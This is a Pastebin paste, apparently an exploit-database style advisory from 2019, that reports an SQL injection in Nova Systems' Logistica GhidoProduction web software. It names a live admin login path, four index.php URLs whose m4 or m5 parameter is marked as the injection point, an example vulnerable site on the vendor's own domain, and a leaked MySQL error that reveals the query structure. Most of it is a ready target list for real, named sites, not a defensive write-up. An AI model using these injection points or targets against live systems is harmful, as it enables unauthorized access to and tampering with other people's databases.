KingSkrupellos

Nova Systems Software Logistica GhidoProduction SQL Inj

Aug 23rd, 2019
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.14 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Nova Systems Software Logistica GhidoProduction SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 24/08/2019
  7. # Vendor Homepage : novasystems.it - ghidoproduction.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Nova Systems Software Logistica GhidoProduction is prone to an SQL-injection vulnerability
  22. because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  23. Exploiting this issue could allow an attacker to compromise the application, access or
  24. modify data, or exploit latent vulnerabilities in the underlying database.
  25. A remote attacker can send a specially crafted request to the vulnerable application and
  26. execute arbitrary SQL commands in application`s database. Further exploitation of this
  27. vulnerability may result in unauthorized data manipulation.
  28. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  29.  
  30. ###################################################################
  31.  
  32. Admin Panel Login Path :
  33. **********************
  34. novacademy.novasystems.it/login/
  35.  
  36. # SQL Injection Exploit :
  37. **********************
  38. /index.php?m1=ita&m2=news&m3=intel_e_nvidia_nuove_prove_di_matrimonio_in_vista&m4=[SQL Injection]
  39.  
  40. /index.php?m1=ita&m2=news&m3=giornale_della_logistica_beone__produttivit_sicurezza_e_risparmio&m4=[SQL Injection]
  41.  
  42. /index.php?m1=eng&m2=news&m3=testimonies&m4=pacorini-forwarding-confirms-the-reliability-of-nova-systems&m5=[SQL Injection]
  43.  
  44. /index.php?m1=esp&m2=noticias&m3=beone_noticias&m4=efreight__estamos_listos&m5=[SQL Injection]
  45.  
  46. ###################################################################
  47.  
  48. # Example Vulnerable Sites :
  49. *************************
  50. [+] novasystems.it/index.php?m1=eng&m2=news&m3=testimonies&m4=pacorini-forwarding-confirms-the-reliability-of-nova-systems&m5=[SQL Injection]
  51.  
  52. ###################################################################
  53.  
  54. # Example SQL Database Error :
  55. ****************************
  56. SELECT * FROM news WHERE lingua='eng' AND pubblica='on' AND ( id_sottomenu_news=
  57. OR FIND_IN_SET( , inset_sottomenu_news) ) ORDER BY data DESC LIMIT 0,2
  58. ==>pdoquery failed: SQLSTATE[42000]: Syntax error or access violation: 1064
  59. You have an error in your SQL syntax; check the manual that corresponds to your MySQL
  60. server version for the right syntax to use near 'OR FIND_IN_SET( , inset_sottomenu_news) )
  61. ORDER BY data DESC LIMIT 0,2' at line 4
  62.  
  63. ###################################################################
  64.  
  65. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  66.  
  67. ###################################################################
Add Comment
Please, Sign In to add comment